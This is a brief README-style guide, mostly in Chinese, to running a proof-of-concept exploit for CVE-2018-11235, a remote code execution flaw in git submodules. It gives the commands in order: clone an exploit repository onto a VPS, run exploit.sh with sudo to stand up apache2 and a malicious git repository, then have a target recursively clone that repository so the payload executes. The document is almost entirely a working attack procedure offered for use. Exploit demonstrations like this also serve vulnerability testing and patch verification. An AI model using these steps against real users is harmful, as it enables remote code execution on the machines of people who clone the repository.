
exploit poc for CVE-2018-11235
ssh 连接到你的 VPS。git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
exploit.sh 添加执行 (x) 权限,然后运行它:sudo chmod +x exploit.sh
sudo ./exploit.sh
它会下载 apache2 并为我们构建恶意仓库。
http://vps-ip/malicious.git 作为 git 仓库。git clone --recurse-submodules http://vps-ip/malicious.git
有效载荷的 RCE 命令应该会执行。
谢谢!